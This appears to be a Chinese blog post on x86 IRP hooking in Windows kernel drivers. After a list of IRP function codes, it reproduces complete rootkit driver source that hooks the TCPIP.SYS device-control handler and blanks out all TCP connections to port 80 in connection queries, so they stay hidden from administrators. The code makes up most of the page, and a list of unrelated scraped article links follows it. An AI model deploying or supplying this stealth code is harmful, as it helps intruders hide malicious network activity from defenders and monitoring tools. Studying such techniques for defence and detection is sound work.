BMOP
BMOP

x86 IRP HOOK

内核中一个很好的隐藏位置是每个设备驱动程序中包含的函数表。在安装驱动程序时,它初始化一个函数指针表,这些指针包含了它的各种类型I/O请求报文(I/O Request Packet IRP)处理函数的地址。IRP处理多种类型的请求,例如读、写和查询。由于驱动程序处于控制流中非常低的层次,因此它们是理想的钩子位置。

以下是微软公司DDK定义的标准IRP类型列表:

// Define the major function codes for IRPs.
#define IRP_MJ_CREATE                         0x00
#define IRP_MJ_CREATE_NAMED_PIPE            0x01
#define IRP_MJ_CLOSE                          0x02
#define IRP_MJ_READ                           0x03
#define IRP_MJ_WRITE                          0x04
#define IRP_MJ_QUERY_INFORMATION            0x05
#define IRP_MJ_SET_INFORMATION              0x06
#define IRP_MJ_QUERY_EA                      0x07
#define IRP_MJ_SET_EA                         0x08
#define IRP_MJ_FLUSH_BUFFERS                 0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION     0x0b
#define IRP_MJ_DIRECTORY_CONTROL            0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL          0x0d
#define IRP_MJ_DEVICE_CONTROL                0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL    0x0f
#define IRP_MJ_SHUTDOWN                      0x10
#define IRP_MJ_LOCK_CONTROL                  0x11
#define IRP_MJ_CLEANUP                        0x12
#define IRP_MJ_CREATE_MAILSLOT              0x13
#define IRP_MJ_QUERY_SECURITY                0x14
#define IRP_MJ_SET_SECURITY                  0x15
#define IRP_MJ_POWER                          0x16
#define IRP_MJ_SYSTEM_CONTROL                0x17
#define IRP_MJ_DEVICE_CHANGE                 0x18
#define IRP_MJ_QUERY_QUOTA                   0x19
#define IRP_MJ_SET_QUOTA                     0x1a
#define IRP_MJ_PNP                             0x1b
#define IRP_MJ_PNP_POWER                     IRP_MJ_PNP     //Obsolete
#define IRP_MJ_MAXIMUM_FUNCTION           0x1b

在Rootkits——Windows内核的安全防护文中介绍了钩住TCPIP.SYS的方法来过滤相关网络连接查询信息的IRP。

 

Rootkit.h的代码:

///
// Filename Rootkit.h
// 
// Author: Jamie Butler
// Email:  [email protected] or [email protected]
//
// Description: Defines globals, function prototypes, etc. used by rootkit.c.
//
// Version: 1.0

typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef BYTE * LPBYTE;

#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003
//#define MAKEPORT(a, b)   ((WORD)(((UCHAR)(a))|((WORD)((UCHAR)(b))) << 8))
#define HTONS(a)  (((0xFF&a)<<8) + ((0xFF00&a)>>8))

typedef struct _CONNINFO101 {
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
} CONNINFO101, *PCONNINFO101;

typedef struct _CONNINFO102 {
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
   unsigned long pid;
} CONNINFO102, *PCONNINFO102;

typedef struct _CONNINFO110 {
   unsigned long size;
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
   unsigned long pid;
   PVOID    unk3[35];
} CONNINFO110, *PCONNINFO110;

typedef struct _REQINFO {
    PIO_COMPLETION_ROUTINE OldCompletion;
    unsigned long          ReqType;
} REQINFO, *PREQINFO;

PFILE_OBJECT pFile_tcp;
PDEVICE_OBJECT pDev_tcp;
PDRIVER_OBJECT pDrv_tcpip;

typedef NTSTATUS (*OLDIRPMJDEVICECONTROL)(IN PDEVICE_OBJECT, IN PIRP);
OLDIRPMJDEVICECONTROL OldIrpMjDeviceControl;

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS InstallTCPDriverHook();
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT, IN PIRP);

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT, IN PIRP, IN PVOID);

 

Rootkit.c

DriverEntry

 1 ///
 2 // Filename Rootkit.c
 3 // 
 4 // Author: Jamie Butler
 5 // Email:  [email protected] or [email protected]
 6 //
 7 // Description: This is where the work gets done.
 8 //
 9 // Version: 1.0
10 // 
11 
12 #include "ntddk.h"
13 #include "tdiinfo.h"
14 //#include "stdio.h"
15 //#include "stdlib.h"
16 
17 #include "Rootkit.h"
18    
19 NTSTATUS DriverEntry(
20                    IN PDRIVER_OBJECT  DriverObject,
21                    IN PUNICODE_STRING RegistryPath
22                     )
23 {
24     
25     NTSTATUS                ntStatus;
26 
27     OldIrpMjDeviceControl = NULL;
28 
29     DriverObject->DriverUnload = RootkitUnload;
30     
31     ntStatus = InstallTCPDriverHook();
32     if(!NT_SUCCESS(ntStatus)) 
33         return ntStatus;
34 
35     return STATUS_SUCCESS;
36 }
InstallTCPDriverHook函数通过IoGetDeviceObjectPointer函数获得这个设备对象的指针,再利用原子操作进行函数地址替换。
 1 NTSTATUS InstallTCPDriverHook()
 2 {
 3     NTSTATUS       ntStatus;
 4 //  UNICODE_STRING deviceNameUnicodeString;
 5 //  UNICODE_STRING deviceLinkUnicodeString;        
 6     UNICODE_STRING deviceTCPUnicodeString;
 7     WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";
 8     pFile_tcp  = NULL;
 9     pDev_tcp   = NULL;
10     pDrv_tcpip = NULL;
11 
12     RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
13     ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
14     if(!NT_SUCCESS(ntStatus)) 
15         return ntStatus;
16     pDrv_tcpip = pDev_tcp->DriverObject;
17 
18     OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; 
19     if (OldIrpMjDeviceControl)
20         InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);
21     
22     return STATUS_SUCCESS;
23 }

inputBuffer->toi_entity.tei_entity 为 CO_TL_ENTITY时隐藏TCP端口

 1 NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
 2 {
 3     PIO_STACK_LOCATION      irpStack;
 4     ULONG                   ioTransferType;
 5     TDIObjectID             *inputBuffer;
 6     DWORD                    context;
 7 
 8     //DbgPrint("The current IRP is at %x\n", Irp);
 9 
10     // Get a pointer to the current location in the Irp. This is where
11     // the function codes and parameters are located.
12     irpStack = IoGetCurrentIrpStackLocation (Irp);
13 
14     switch (irpStack->MajorFunction) 
15     {
16         case IRP_MJ_DEVICE_CONTROL:
17             if ((irpStack->MinorFunction == 0) && \
18                 (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
19             {
20                 ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
21                 ioTransferType &= 3;
22                 if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer
23                 {
24                     inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;
25                     
26                     // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP
27                     if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
28                     { 
29                         // DbgPrint("Input buffer %x\n",inputBuffer);
30                         if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
31                         {
32                             // Call our completion routine if IRP successful
33                             irpStack->Control = 0;
34                             irpStack->Control |= SL_INVOKE_ON_SUCCESS; 
35 
36                             // Save old completion routine if present
37                             irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));
38 
39                             ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine; 
40                             ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;
41 
42                             // Setup our function to be called on completion of IRP
43                             irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
44                         }
45                     }
46                 }
47             }
48         break;
49         
50         default:
51         break;
52     }
53 
54     return OldIrpMjDeviceControl(DeviceObject, Irp);
55 }

以下的示例代码隐藏了一条目的端口为TCP 80的连接

 1 NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, 
 2                              IN PIRP Irp, 
 3                              IN PVOID Context)
 4 {
 5     PVOID OutputBuffer;
 6     DWORD NumOutputBuffers;
 7     PIO_COMPLETION_ROUTINE p_compRoutine;
 8     DWORD i;
 9 
10     // Connection status values:
11     // 0 = Invisible
12     // 1 = CLOSED
13     // 2 = LISTENING
14     // 3 = SYN_SENT
15     // 4 = SYN_RECEIVED
16     // 5 = ESTABLISHED
17     // 6 = FIN_WAIT_1
18     // 7 = FIN_WAIT_2
19     // 8 = CLOSE_WAIT
20     // 9 = CLOSING
21     // ...
22 
23     OutputBuffer = Irp->UserBuffer;
24     p_compRoutine = ((PREQINFO)Context)->OldCompletion;
25 
26     if (((PREQINFO)Context)->ReqType == 0x101)
27     {
28         NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
29         for(i = 0; i < NumOutputBuffers; i++)
30         {
31             // Hide all Web connections
32             if (HTONS(((PCONNINFO101)OutputBuffer)[i].dst_port) == 80)
33                 ((PCONNINFO101)OutputBuffer)[i].status = 0;
34         }
35     }
36     else if (((PREQINFO)Context)->ReqType == 0x102)
37     {
38         NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
39         for(i = 0; i < NumOutputBuffers; i++)
40         {
41             // Hide all Web connections
42             if (HTONS(((PCONNINFO102)OutputBuffer)[i].dst_port) == 80)
43                 ((PCONNINFO102)OutputBuffer)[i].status = 0;
44         }
45     }
46     else if (((PREQINFO)Context)->ReqType == 0x110)
47     {
48         NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
49         for(i = 0; i < NumOutputBuffers; i++)
50         {
51             // Hide all Web connections
52             if (HTONS(((PCONNINFO110)OutputBuffer)[i].dst_port) == 80)
53                 ((PCONNINFO110)OutputBuffer)[i].status = 0;
54         }
55     }
56 
57     ExFreePool(Context);
58 
59     /*
60     for(i = 0; i < NumOutputBuffers; i++)
61     {
62         DbgPrint("Status: %d",OutputBuffer[i].status);
63         DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));
64         DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));
65     }*/
66 
67     if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
68     {
69         return (p_compRoutine)(DeviceObject, Irp, NULL);
70     }
71     else
72     {
73         return Irp->IoStatus.Status;
74     }
75 }

卸载驱动 注意别忘了解引用

 1 NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
 2 {
 3     if (OldIrpMjDeviceControl)
 4         InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);    
 5     if (pFile_tcp != NULL)
 6         ObDereferenceObject(pFile_tcp);
 7     pFile_tcp = NULL;
 8 
 9     return STATUS_SUCCESS;
10 }

 

你可能感兴趣的:(Windows系统)

  • Windows多版本python共存 翟光 PythonPython
    1.简介Python自从进入3.x版本后,与2.x的版本发生了许多变化,3.x对2.x也不兼容。在实际应用中,可能会2.x和3.x的版本交叉应用,因此,需要在本地安装多个版本的Python。本处介绍一种在Windows系统下安装多个不同版本的python的方法,安装后无需进行任何特殊的处理(例如将python.exe更名为python2.exe什么的)即可使用。2.安装环境本人的安装环境如下:系统
  • 在 Mac 上安装双系统会影响性能吗,安装双系统会清除数据吗? 星空爱忆 ParallelsMac
    在Mac系统安装并使用双系统已经成为了许多用户办公的选择之一,双系统可以让用户在Mac上同时运行Windows或其他操作系统。然而,许多用户担心这样做会对Mac的性能产生影响。接下来将给大家介绍Mac装双系统会影响性能吗,Mac装双系统会清空数据吗的具体内容。Mac装双系统会影响性能吗当我们使用Mac装双系统时,需要使用专业的虚拟机软件。安装完成的Windows系统需要借助虚拟机软件才能够在mac
  • 在Mac上更好的运行Windows,推荐这几款Mac虚拟机 mac运行windows虚拟机性能 是软妹子呀 果粉新潮macosMac运行Windows虚拟机软件开源软件
    想要在MacOS上更好的运行Windows系统吗?推荐你使用mac虚拟机。虚拟机通过生成现有操作系统的全新虚拟镜像,它具有真实windows系统完全一样的功能,进入虚拟系统后,所有操作都是在这个全新的独立的虚拟系统里面进行,可以独立安装运行软件,保存数据,拥有自己的独立桌面,不会对真正的系统产生任何影响。ParallelsDesktop19forMac虚拟机ParallelsDesktop是一款功
  • win10配置python_Win 10安装Python及环境变量配置 weixin_39663933 win10配置python
    一、Windows系统很多童鞋问之前的教程怎么没有介绍安装python3.5的,现予以补充更新一下。(一)安装python3.51、下载进入Python官网www.python.org,在“Downloads”下拉菜单中的右半部分直接点击python3.5.2版本即可下载,它会自动下载32位的。如果需要64位,点击左半部分“Windows”,选择第二项“LatestPython3Release-P
  • Windows系统下安装Redis bjzhang75 windowsredis数据库
    文章目录1、下载Redis安装包2、解压压缩包3、运行Redis4、Redis连接检测5、Redis相关设置5.1设置环境变量PATH5.2Redis配置文件修改1、下载Redis安装包Windows版本的Redis可以在Github中下载:下载Redis2、解压压缩包将下载的压缩包解压到某个目录下,比如:C:\redis。3、运行Redis在cmd窗口中运行命令redis-serverredis
  • Python中的os.path.join() 小小小花儿
    Python中的os.path.join()用于拼接路径名组件。路径组件之间会自动添加‘\’,也可以自己在组件的末尾加上‘\’。1、如果各路径组件名首字母均不包含‘\’,则函数会自动加上。importosa=os.path.join('save','test','1.jpg')print(a)输出:save\test\1.jpg注意:在windows系统中默认添加的是‘\’;在linux系统中,是
  • [Windows] MinGW 与 MSYS2 ERIC-ZI Windowswindows
    一、MinGW(MinimalistGNUforWindows)MinGW(MinimalistGNUforWindows)是一个专为Windows系统设计的工具集,旨在为Windows开发者提供一个轻量级且高效的GNU工具链。该工具集的核心是GNU编译器集合(GCC),其中包括了支持多种编程语言的编译器,如C、C++和Ada。MinGW的主要目标是让开发者能够在Windows系统上直接编译和运行
  • Python 安装 Selenium 报错解决方案:全方位排错指南 小柒笔记 pythonselenium开发语言
    引言在尝试使用pip安装Selenium库时,您可能会遇到中断报错,这通常是由于多种原因造成的,如网络问题、权限问题或依赖项缺失等。本文将指导您如何解决这一常见问题。一、检查网络连接首先,确保您的网络连接稳定。pip安装过程中需要从互联网下载包,因此网络不稳定可能导致安装失败。二、使用管理员权限运行在Windows系统中,尝试使用管理员权限运行命令提示符或PowerShell。右键点击命令提示符或
  • Anaconda 安装与使用教程 寂然如故 python
    Anaconda安装与使用教程目录-[简介](#简介)-[安装Anaconda](#安装anaconda)-[Windows系统](#windows系统)-[macOS系统](#macos系统)-[Linux系统](#linux系统)-[启动AnacondaPrompt(命令行)](#启动anaconda-prompt-命令行)-[创建与管理环境](#创建与管理环境)-[创建环境](#创建环境)-
  • 两台电脑如何建立局域网?三种简便方法推荐 节点小宝 科技物联网服务器远程工作网络
    方法一:使用网线直接连接1、准备一根网线,长度不宜过长(建议不要超过80米,否则信号会衰减),确保两台电脑相邻或距离较近。2、将网线的一头插入一台电脑的网口,另一头插入另一台电脑的网口。3、打开电脑,进入网络设置。在Windows系统中,可以点击桌面下方的网络图标,选择“网络设置”。4、在网络设置中,找到“以太网(本地连接)”选项,并选择“网络和共享中心”。5、在“网络和共享中心”中,找到“以太网
  • Python 安装selenium时遇到问题解决措施 博吧啦 pythonselenium开发语言
    在使用pip安装selenium库的过程中可能会遇到各种各样的问题。通过这篇文章,大多数与selenium安装相关的问题都可以得到解决。希望对各位有帮助。1、确保网络连接稳定安装过程需要网络,网络不稳定可能导致安装失败。2、使用管理员权限运行以Windows系统为例:按Windows键+X以显示WinX菜单。从弹出菜单中,选择"WindowsPowerShell(管理员)"以管理员模式打开它。Wi
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络安全运维
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 2-NumPy下载与安装 qwy715229258163 Numpynumpy
    NumPy下载与安装NumPy是Python的第三方扩展包,但它并没有包含在Python标准库中,因此您需要单独安装它。本节介绍如何在不同的操作系统上安装NumPy。Windows系统安装在Windows系统下安装NumPy有两种常用方式,下面分别对其进行介绍。使用Python包管理器pip来安装NumPy,是一种最简单、最轻量级的方法。只需执行以下命令即可:pipinstallnumpy在实际项
  • chromedriver驱动下载 小太阳☀️ Python爬虫seleniumChrome爬虫
    下载各个版本的chromedriver,包括linux系统、Mac系统和Windows系统下载地址一:http://chromedriver.storage.googleapis.com/index.html下载地址二:https://npm.taobao.org/mirrors/chromedriver/
  • python学习——conda install Python库时报PackagesNotFoundError:的错误的解决方案,很实用 _Oak_Tree_ python基础python
    安装完成Anaconda之后,我们可以在AnacondaPrompt交互式窗口中通过“condainstall库名称”实现Python库的安装,但是有时候在运用该命令进行安装时会提示PackagesNotFoundError:Thefollowingpackagesarenotavailablefromcurrentchannels:的错误,现在以Pydap库的安装为例,提供在Windows系统下
  • 怎么确认python安装成功_如何验证python安装成功 weixin_39751871 怎么确认python安装成功
    windows系统,运行—cmd,进入dos窗口,输入python,安装成功的话可以看到版本信息并进入编程模式,如下图(我安装的版本是python2.7.13)输入:print'helloworld',按回车。成功打印。没有报错,说明Python已经成功安装了。内容扩展:什么是一个好的方法来检查一个包是否在Python脚本内安装?我知道这很容易从解释器,但我需要在一个脚本中这样做。我想我可以检查在
  • 当路由器出现DNS没有被解析的情况时,可以尝试以下修复建议来解决问题 weixin_45544617 智能路由器
    当路由器出现DNS没有被解析的情况时,可以尝试以下修复建议来解决问题:1.检查网络连接确保路由器和调制解调器(如果有的话)正常工作,并且所有连接线缆都正确连接。尝试重新启动路由器和调制解调器,以解决可能的临时网络问题。2.刷新DNS缓存Windows系统:打开命令提示符(CMD),输入ipconfig/flushdns命令,然后回车执行,以清除本地DNS缓存。Mac系统:打开终端,输入sudoki
  • windows系统最新python多版本,虚拟环境配置 web:小源 windowspython开发语言
    window系统python多版本管理方法一:按照教程安装https://github.com/pyenv-win/pyenv-win方法二:下载压缩包,配置环境变量2.1克隆项目:gitclonehttps://github.com/pyenv-win/pyenv-win.git2.2配置环境变量2.3使用方法"""pyenvinstall--list#查看可以下载的版本pyenvinstall
  • 如何在Windows系统上同时安装多个Python版本并设置默认版本 RelievedCy pythonwindowspython开发语言
    如何在Windows系统上同时安装多个Python版本并设置默认版本。目录如何在Windows系统上同时安装多个Python版本并设置默认版本在在Windows系统设置默认Python版本使用py命令无法设置时:1.更改环境变量2.重命名Python解释器文件测试结果在开发Python项目时,有时我们需要同时使用多个Python版本。然而,在Windows系统上管理多个Python版本可能会引起一
  • .chm 文档打不开 shijiahang 其他.chm
    首先我们要知道什么是.chm文档。CHM是英语“CompiledHelpManual”的简写,即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。-----引用自百度知道如何打开.chm文档一般情况,Windows系统会自带解释器(打卡工具:hh.exe)。或者,你也可以下载一个CHM编辑器。也可以轻松打开。我遇到的问题一般直接打开的
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络网络安全
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 快速上手指南:在Windows系统中下载Ollama,一键启动大模型体验! 再不会AI就不礼貌了 人工智能学习方法大数据llama语言模型
    1.下载ollama官网下载安装:ollama.com2.拉取大模型llama3.1终端中输入ollamapullllama3.1,等待安装3.运行llama3.1ollamarunllama3.1接下来就可以和模型对话了退出/bye运行/?查看更多聊天中命令其他ollamagithub:github.com/ollama/olla…常用命令删除模型:ollamarmollamarmllama3.
  • Rust 语言从入门到实战 唐刚--学习笔记01 zhanglz888 Rust语言从入门到实战唐刚学习笔记rust学习笔记
    Rust语言从入门到实战唐刚基础篇(11讲)01|快速入门:Rust的基础语法Rust宣称的安全、高性能、无畏并发这些特点,初次接触的时候都是感受不到的。安装Rust编译器套件MacOS或Linux,执行:curl--proto'=https'--tlsv1.2-sSfhttps://sh.rustup.rs|sh按提示操作Windows系统(WSL中/Windows原生平台)WSL中,curl-
  • notepad++软件介绍(含安装包) LQS2020 notepad++
    Notepad++是一款开源的文本编辑器,主要用于编程和代码编辑。它是一个功能强大的替代品,常常被用来替代Windows系统自带的记事本。Notepad++win系统免费下载地址以下是Notepad++的一些主要特点和功能:多语言支持:Notepad++支持多种编程语言,包括Python、JavaScript、HTML、CSS、C++、Java等。它能够根据文件类型自动高亮显示语法,使代码更加易读
  • linux从入门到放弃权限管理,「Linux从入门到放弃」07节-Linux权限介绍 佳丽影像 linux从入门到放弃权限管理
    概述我们说Linux较Windows安全的原因之一是Linux的权限设计比Windows系统要严谨可靠。本节比较重要,网络圈会向大家介绍Linux权限知识,运维同学要划下重点哦。请注意:此节会涉及用户、用户组的概念,大家如果对用户(组)不理解没有关系,后面会有单独章节详细解说。权限分类及标识Linux权限可分为下面四种,每种权限可以用特定字母来标识,也可以用特定数字来标识:读权限:r或者4写权限:
  • Windows安装mamba全流程(全网最稳定最成功) 一本糊涂张~ 深度学习windows
      windows系统下安装mamba会遇到各种各样的问题。博主试了好几天,把能踩的坑都踩了,总结出了在windows下安装mamba的一套方法,已经给实验室的windows服务器都装上了。只要跟着我的流程走下来,大概率不会出问题,如果遇到其他问题,可以在评论区讨论,我会的我会回复。  主要的流程步骤是参考这篇文章,并对其中遇到的问题进行改进。  首先创建mamba的环境,然后安装必要的库。请你创
  • linux虚拟机设置静态ip并访问外网 却诚Salong 安装问题和解决方法linuxtcp/ip服务器
    需求:需要用vmware做虚拟机集群,但是前提是保证每个节点的ip固定,而且还要联网。1.先确保你的动态ip状况下可以正常ping通外网,具体怎么配置这里不做详细解释。2.在windows系统应用中打开虚拟网络编辑器,查看网关ip。3.然后在linux虚拟机中输入ifconfig,查看linux的ip地址[root@localhostnetwork-scripts]#ifconfigens33:f
  • windows系统下配置Mamba环境 ls077 windows
    最近在学习AI知识,试图在安装最近爆火的mamba模型时遇到困难。参考网上各位达人,经过努力,终于在win11系统anaconda中成功编译安装了mamba包。我用的是visualstudio20191.在windows下构建Mamba使用环境:condacreate-nmambapython=3.10condaactivatemamba注:Mamba需要triton,然而triton没有wind
  • Windows系统上更换pip源的详细指南 2402_85758349 windowspip
    Python的包管理工具pip允许用户从Python包索引(PyPI)下载和安装第三方库。然而,默认的PyPI源有时可能因为网络问题或地理位置导致访问速度较慢。更换为更快的源可以显著提高下载和安装Python包的速度。本文将详细介绍如何在Windows系统上更换pip的源。1.理解pip源的重要性更换pip源是优化Python开发环境的重要步骤之一。一个快速且稳定的源可以提高包管理的效率,尤其是在
  • python 安装 win32com 郎君啊 python开发语言
    扩展,Python,安装相关视频讲解:StableDiffusion提升出图速度,TensorRT扩展,SDXL-SSD-1B-A1111,速度提升60%,PyTorch更新python的or运算赋值用法用python编程Excel有没有用处?如何在Windows系统上安装win32com一、整体流程步骤操作1下载并安装Python2安装pywin32扩展包3验证安装是否成功二、具体操作步骤及代码
  • HQL之投影查询 归来朝歌 HQLHibernate查询语句投影查询
            在HQL查询中,常常面临这样一个场景,对于多表查询,是要将一个表的对象查出来还是要只需要每个表中的几个字段,最后放在一起显示? 针对上面的场景,如果需要将一个对象查出来: HQL语句写“from 对象”即可 Session session = HibernateUtil.openSession();
  • Spring整合redis bylijinnan redis
    pom.xml <dependencies> <!-- Spring Data - Redis Library --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redi
  • org.hibernate.NonUniqueResultException: query did not return a unique result: 2 0624chenhong Hibernate
    参考:http://blog.csdn.net/qingfeilee/article/details/7052736 org.hibernate.NonUniqueResultException: query did not return a unique result: 2         在项目中出现了org.hiber
  • android动画效果 不懂事的小屁孩 android动画
    前几天弄alertdialog和popupwindow的时候,用到了android的动画效果,今天专门研究了一下关于android的动画效果,列出来,方便以后使用。 Android 平台提供了两类动画。 一类是Tween动画,就是对场景里的对象不断的进行图像变化来产生动画效果(旋转、平移、放缩和渐变)。 第二类就是 Frame动画,即顺序的播放事先做好的图像,与gif图片原理类似。
  • js delete 删除机理以及它的内存泄露问题的解决方案 换个号韩国红果果 JavaScript
    delete删除属性时只是解除了属性与对象的绑定,故当属性值为一个对象时,删除时会造成内存泄露  (其实还未删除) 举例: var person={name:{firstname:'bob'}} var p=person.name delete person.name p.firstname -->'bob' // 依然可以访问p.firstname,存在内存泄露
  • Oracle将零干预分析加入网络即服务计划 蓝儿唯美 oracle
    由Oracle通信技术部门主导的演示项目并没有在本月较早前法国南斯举行的行业集团TM论坛大会中获得嘉奖。但是,Oracle通信官员解雇致力于打造一个支持零干预分配和编制功能的网络即服务(NaaS)平台,帮助企业以更灵活和更适合云的方式实现通信服务提供商(CSP)的连接产品。这个Oracle主导的项目属于TM Forum Live!活动上展示的Catalyst计划的19个项目之一。Catalyst计
  • spring学习——springmvc(二) a-john springMVC
    Spring MVC提供了非常方便的文件上传功能。 1,配置Spring支持文件上传: DispatcherServlet本身并不知道如何处理multipart的表单数据,需要一个multipart解析器把POST请求的multipart数据中抽取出来,这样DispatcherServlet就能将其传递给我们的控制器了。为了在Spring中注册multipart解析器,需要声明一个实现了Mul
  • POJ-2828-Buy Tickets aijuans ACM_POJ
    POJ-2828-Buy Tickets http://poj.org/problem?id=2828 线段树,逆序插入 #include<iostream>#include<cstdio>#include<cstring>#include<cstdlib>using namespace std;#define N 200010struct
  • Java Ant build.xml详解 asia007 build.xml
    1,什么是antant是构建工具2,什么是构建概念到处可查到,形象来说,你要把代码从某个地方拿来,编译,再拷贝到某个地方去等等操作,当然不仅与此,但是主要用来干这个3,ant的好处跨平台   --因为ant是使用java实现的,所以它跨平台使用简单--与ant的兄弟make比起来语法清晰--同样是和make相比功能强大--ant能做的事情很多,可能你用了很久,你仍然不知道它能有
  • android按钮监听器的四种技术 百合不是茶 androidxml配置监听器实现接口
    android开发中经常会用到各种各样的监听器,android监听器的写法与java又有不同的地方;    1,activity中使用内部类实现接口 ,创建内部类实例  使用add方法  与java类似   创建监听器的实例 myLis lis = new myLis();   使用add方法给按钮添加监听器  
  • 软件架构师不等同于资深程序员 bijian1013 程序员架构师架构设计
            本文的作者Armel Nene是ETAPIX Global公司的首席架构师,他居住在伦敦,他参与过的开源项目包括 Apache Lucene,,Apache Nutch, Liferay 和 Pentaho等。         如今很多的公司
  • TeamForge Wiki Syntax & CollabNet User Information Center sunjing TeamForgeHow doAttachementAnchorWiki Syntax
    the CollabNet user information center http://help.collab.net/   How do I create a new Wiki page? A CollabNet TeamForge project can have any number of Wiki pages. All Wiki pages are linked, and
  • 【Redis四】Redis数据类型 bit1129 redis
    概述 Redis是一个高性能的数据结构服务器,称之为数据结构服务器的原因是,它提供了丰富的数据类型以满足不同的应用场景,本文对Redis的数据类型以及对这些类型可能的操作进行总结。 Redis常用的数据类型包括string、set、list、hash以及sorted set.Redis本身是K/V系统,这里的数据类型指的是value的类型,而不是key的类型,key的类型只有一种即string
  • SSH2整合-附源码 白糖_ eclipsespringtomcatHibernateGoogle
    今天用eclipse终于整合出了struts2+hibernate+spring框架。 我创建的是tomcat项目,需要有tomcat插件。导入项目以后,鼠标右键选择属性,然后再找到“tomcat”项,勾选一下“Is a tomcat project”即可。具体方法见源码里的jsp图片,sql也在源码里。     补充1:项目中部分jar包不是最新版的,可能导
  • [转]开源项目代码的学习方法 braveCS 学习方法
    转自: http://blog.sina.com.cn/s/blog_693458530100lk5m.html http://www.cnblogs.com/west-link/archive/2011/06/07/2074466.html   1)阅读features。以此来搞清楚该项目有哪些特性2)思考。想想如果自己来做有这些features的项目该如何构架3)下载并安装d
  • 编程之美-子数组的最大和(二维) bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; import java.util.Random; public class MaxSubArraySum2 { /** * 编程之美 子数组之和的最大值(二维) */ private static final int ROW = 5; private stat
  • 读书笔记-3 chengxuyuancsdn jquery笔记resultMap配置ibatis一对多配置
    1、resultMap配置 2、ibatis一对多配置 3、jquery笔记 1、resultMap配置 当<select resultMap="topic_data"> <resultMap id="topic_data">必须一一对应。 (1)<resultMap class="tblTopic&q
  • [物理与天文]物理学新进展 comsci
